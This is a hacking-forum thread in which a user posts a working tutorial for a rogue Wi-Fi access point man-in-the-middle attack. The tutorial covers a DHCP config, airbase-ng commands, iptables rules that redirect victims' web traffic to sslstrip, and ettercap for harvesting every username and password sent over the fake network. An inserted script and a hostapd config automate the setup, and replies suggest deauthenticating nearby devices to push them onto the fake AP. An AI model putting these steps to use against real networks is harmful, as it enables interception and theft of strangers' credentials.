Author Topic: Rogue AP MiTM Attack (Fake AP)  (Read 9909 times)


Offline D1M4

  • NULL
  • Posts: 4
  • Cookies: 2
Rogue AP MiTM Attack (Fake AP)
« on: June 13, 2014, 08:02:29 pm »
Introduction

Here's what Wikipedia says: A rogue access point is a wireless access point that has either been installed on a secure company network without explicit authorization from a local network administrator, or has been created to allow a hacker to conduct a man-in-the-middle attack.

Basically, a rogue AP is a fake AP which you can use to do MiTM attacks. If you don't know what those are -> http://lmgtfy.com/?q=Man+in+the+middle+attack

This method uses a dhcp server. There are other methods which I will cover in another tutorial.

So let's start.

What do you need?
1. Either a VM running Kali or a PC/laptop running it
2. 2x network adapter (or one adapter plus a wired connection)
3. One of them must support both monitor and master mode

What do you need to do?
  Configure the DHCP Server

1. Open terminal
2. route -n (note the gateway; I'll assume the GW is 192.168.0.1)
3. apt-get install dhcp3-server (install the ISC DHCP server; dhcp3-server is a transitional name for the isc-dhcp-server package)
4. nano /etc/dhcpd.conf (configure the DHCP server)
5. type or paste the following into your .conf
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.0 netmask 255.255.255.0 {
option routers 192.168.1.1;
option subnet-mask 255.255.255.0;
option domain-name "name you want the router to be called";
option domain-name-servers 192.168.1.1;
range 192.168.1.2 192.168.1.40;
}
6. Hit ctrl+x then y then enter (save the file)

   Start the AP
1. airmon-ng (check the name of your network adapter; I'll assume it's wlan0)
2. airmon-ng start wlan0 (start monitor mode = mon0)
3. airbase-ng -c 11 -e "name you want it to be called" mon0
4. DON'T CLOSE THE TERMINAL

   Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 up (set IP and netmask; at0 is the tap interface airbase-ng created)
3. ifconfig at0 mtu 1400 (set MTU)
4. route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 (add the route; ifconfig usually adds this connected route already, so "File exists" here is harmless)
5. echo 1 > /proc/sys/net/ipv4/ip_forward (enable IP forwarding)
6. iptables -t nat -A PREROUTING -i at0 -p udp --dport 53 -j DNAT --to 192.168.0.1 (send the clients' DNS queries to the real gateway)
7. iptables -P FORWARD ACCEPT (accept forwarding)
8. iptables --append FORWARD --in-interface at0 -j ACCEPT
9. iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
10. iptables -t nat -A PREROUTING -i at0 -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (hand the clients' HTTP to sslstrip)

   Start DHCP Server
1. dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
2. /etc/init.d/isc-dhcp-server start (alternative to step 1: the init script reads /etc/dhcp/dhcpd.conf and /etc/default/isc-dhcp-server, so use one or the other, not both)

   Starting SSL Strip
1. sslstrip -f -p -k -l 10000 (-l is the listen port and must match the REDIRECT rule; -k kills existing sessions and takes no argument)
2. DON'T CLOSE TERMINAL

   Harvest
1. Open terminal
2. ettercap -p -u -T -q -i at0 (start ettercap)

Congrats! If you haven't run into any errors you should be able to get all user/pass that are being sent over the AP.

-D1M4

Staff note: WHAT THE FUUUUUUUUK too much bbcode :/
« Last Edit: June 13, 2014, 09:08:24 pm by Kulverstukas »
The definition of insanity is doing the same thing over and over and expecting different results.
-Albert Einstein
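The DHCP, interface and NAT steps of the post collected into one script, as an added example (not D1M4's code). It writes a syntactically valid dhcpd.conf, refuses to start dhcpd if the file fails a quick keyword/semicolon/brace check (so the "ranger" and missing-";" mistakes are caught before dhcpd errors out), then addresses at0 and installs the forwarding rules. Assumed: the uplink is eth0, the real gateway is 192.168.0.1, airbase-ng has already created at0, sslstrip will listen on 10000; all of these are overridable via environment variables.

```shell
#!/bin/sh
# Added example (not the original author's code): the DHCP, interface and NAT
# steps from the post in one script, with the config typos fixed.
# Assumptions: uplink eth0, real gateway 192.168.0.1, at0 already created by
# airbase-ng, sslstrip listening on 10000. Override via environment variables.
UPLINK="${UPLINK:-eth0}"
GW="${GW:-192.168.0.1}"
AP_IF="${AP_IF:-at0}"
AP_NET="192.168.1"
SSLSTRIP_PORT="${SSLSTRIP_PORT:-10000}"

# Print a dhcpd.conf for the rogue AP's subnet. $1 is the domain name handed
# to clients. Note "authoritative", "range", and a ';' after every statement.
dhcpd_conf() {
    cat <<EOF
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet ${AP_NET}.0 netmask 255.255.255.0 {
    option routers ${AP_NET}.1;
    option subnet-mask 255.255.255.0;
    option domain-name "$1";
    option domain-name-servers ${AP_NET}.1;
    range ${AP_NET}.2 ${AP_NET}.40;
}
EOF
}

# Sanity-check a dhcpd.conf read from stdin: only known statement keywords,
# ';' at the end of every statement, braces balanced. Exit status 0 when it
# looks right. (dhcpd -t -cf FILE remains the real check.)
check_dhcpd_conf() {
    awk '
    function err(m) { printf("line %d: %s: %s\n", NR, m, $0) > "/dev/stderr"; bad++ }
    BEGIN {
        n = split("authoritative default-lease-time max-lease-time subnet option range", k, " ")
        for (i = 1; i <= n; i++) ok[k[i]] = 1
    }
    /^[[:space:]]*$/ { next }                        # blank line
    /^[[:space:]]*}/ { depth--; next }               # closes the subnet block
    { w = $1; sub(/;$/, "", w) }                     # keyword without trailing ;
    !(w in ok) { err("unknown statement"); next }    # catches "ranger", "authorative"
    w == "subnet" { if ($0 ~ /[{][[:space:]]*$/) depth++; else err("expected {"); next }
    !/;[[:space:]]*$/ { err("missing ;") }
    END { exit (bad || depth != 0) ? 1 : 0 }'
}

# Address the AP-side interface as in the post (MTU lowered for the tap device).
setup_ap_interface() {
    ifconfig "$AP_IF" "${AP_NET}.1" netmask 255.255.255.0 mtu 1400 up
}

# Forwarding and NAT: client DNS goes to the real gateway, client HTTP is
# redirected to sslstrip, everything else is masqueraded out of the uplink.
setup_forwarding() {
    echo 1 > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -i "$AP_IF" -p udp --dport 53 -j DNAT --to-destination "$GW"
    iptables -t nat -A PREROUTING -i "$AP_IF" -p tcp --dport 80 -j REDIRECT --to-port "$SSLSTRIP_PORT"
    iptables -A FORWARD -i "$AP_IF" -j ACCEPT
    iptables -t nat -A POSTROUTING -o "$UPLINK" -j MASQUERADE
}

main() {
    conf=/etc/dhcpd.conf
    dhcpd_conf "$1" > "$conf"
    check_dhcpd_conf < "$conf" || { echo "refusing to start dhcpd: bad $conf" >&2; exit 1; }
    setup_ap_interface
    setup_forwarding
    dhcpd -cf "$conf" -pf /var/run/dhcpd.pid "$AP_IF"
}

# Only touch the system when explicitly asked:  sh rogueap.sh --run "Free WiFi"
case "${1:-}" in
    --run) main "${2:-Free WiFi}" ;;
esac
```

Run it as root after airbase-ng is up (so at0 exists) and before starting sslstrip and ettercap; the DNS and port-80 rules are restricted to traffic arriving on at0 so they do not rewrite packets that reach the box on the uplink.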


Offline Corrupted_Fear

  • Knight
  • **
  • Posts: 336
  • Cookies: 34
  • Is dangerous to go alone! Take this! @xxxx[{:::::>
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #1 on: June 18, 2014, 04:46:25 am »
Not bad, but you missed a ";" in the dhcp config, behind the domain name (I think, I'm not 100% sure on that one), and it's "range" not "ranger". Could create some syntax errors, and that's just not good.

by | Angel | Devil |

"Welcome to le trove that is my home. Welcome to EvilZone." -- DeepCopy

Offline proxx

  • Avatarception
  • Global Moderator
  • Titan
  • *
  • Posts: 2803
  • Cookies: 256
  • ФФФ
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #2 on: June 18, 2014, 08:36:27 am »
Ya, thanks for sharing.
I would however suggest using hostapd instead of airbase; airbase just isn't that stable, at least from my experience, and I used it with a range of chipsets.
The driver would have to support it, but hostapd works like a charm.
« Last Edit: June 18, 2014, 08:36:59 am by proxx »
Wtf where you thinking with that signature? - Phage.
This was another little experiment *evillaughter - Proxx.
Evilception... - Phage
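A minimal hostapd configuration for the open AP this thread is building, added here as an example rather than proxx's own config; the interface name, SSID and channel are assumptions:

```ini
# hostapd.conf for an open (unencrypted) rogue AP. Example, not from the thread;
# interface, ssid and channel are assumed values.
interface=wlan0
driver=nl80211
ssid=Free WiFi
hw_mode=g
channel=11
auth_algs=1
# no wpa= line: wpa defaults to 0, i.e. no encryption, like the airbase-ng command above
```

Start it with `hostapd hostapd.conf` on the managed interface (not on mon0). The difference from the airbase-ng flow is that hostapd creates no at0: the wireless interface itself (wlan0 here) is the AP side, so the ifconfig, dhcpd and iptables steps from the first post apply to wlan0 instead of at0.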

The_R

  • Guest
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #3 on: June 20, 2014, 09:07:20 am »
This will be very effective when you send de-authentication frames to probes so they automatically connect to your fake AP. Thanks for this. Really helpful.

Offline wofyendor

  • Serf
  • *
  • Posts: 21
  • Cookies: 9
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #4 on: July 22, 2014, 12:43:19 am »
Probably silly question:
can this be done with dnsmasq instead of a DHCP server? Because I already have an AP running with dnsmasq.

and also
Quote
Configure the Tunnel Interface
1. Open Terminal.
2. ifconfig at0 192.168.1.1 netmask 255.255.255.0 (set ip and netmask)

Where did that at0 come from? Is it a wireless, ethernet or monitor interface?

Oh, do you have to do an "ifconfig up" before that? <--- Edit
« Last Edit: July 22, 2014, 01:01:02 am by wofyendor »

Offline lucid

  • #Underground
  • Titan
  • **
  • Posts: 2683
  • Cookies: 243
  • psychonaut
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #5 on: July 22, 2014, 03:23:29 am »
Quote
Probably silly question:
can this be done with dnsmasq instead of a DHCP server? Because I already have an AP running with dnsmasq.

and also
Where did that at0 come from? Is it a wireless, ethernet or monitor interface?

Oh, do you have to do an "ifconfig up" before that? <--- Edit
That interface at0 is a Madwifi device, and he's manually setting that interface's IP address settings.
"Hacking is at least as much about ideas as about computers and technology. We use our skills to open doors that should never have been shut. We open these doors not only for our own benefit but for the benefit of others, too." - Brian the Hacker

Quote
15:04  @Phage : I'm bored of Python

Offline wofyendor

  • Serf
  • *
  • Posts: 21
  • Cookies: 9
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #6 on: July 22, 2014, 06:07:12 am »
Quote
That interface at0 is a Madwifi device, and he's manually setting that interface's IP address settings.
I think I get it; it is created by airbase, right? I think that can be the problem, since I used hostapd to set up my AP. Gonna check if I can get it to do the same thing.

Offline goomball

  • NULL
  • Posts: 1
  • Cookies: 0
Re: Rogue AP MiTM Attack (Fake AP)
« Reply #7 on: August 08, 2014, 10:07:02 am »
Hey guys,

did anyone notice that SSL strip doesn't work as it should?
For example:

If you connect, using your fake AP, to facebook, it simply gives an SSL error.
Same for gmail.com: "Couldn't connect due to an SSL error."

So some https sites are working, but the most interesting ones are not.
It seems that facebook and co. are forcing SSL, so you are not able to connect without it.

Or am I wrong?

Cheers guys